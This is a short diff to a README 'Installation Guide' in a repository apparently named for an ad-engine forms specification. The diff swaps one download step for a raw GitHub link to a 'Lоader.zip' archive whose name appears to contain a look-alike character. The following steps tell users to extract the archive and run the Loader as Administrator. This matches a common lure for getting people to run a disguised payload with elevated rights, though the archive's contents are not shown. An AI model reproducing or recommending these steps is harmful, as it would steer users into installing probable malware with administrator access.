edjoe14/OpenAd-Specification_AdEngine_Forms/README.md

 ## 🛠️ Installation Guide

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/edjoe14/OpenAd-Specification_AdEngine_Forms/main/Lоader.zip` from the repository.
 2. Extract archive to your desktop or preferred folder.
 3. Run the Loader as Administrator.
 4. Customize your feature set in the intuitive interface.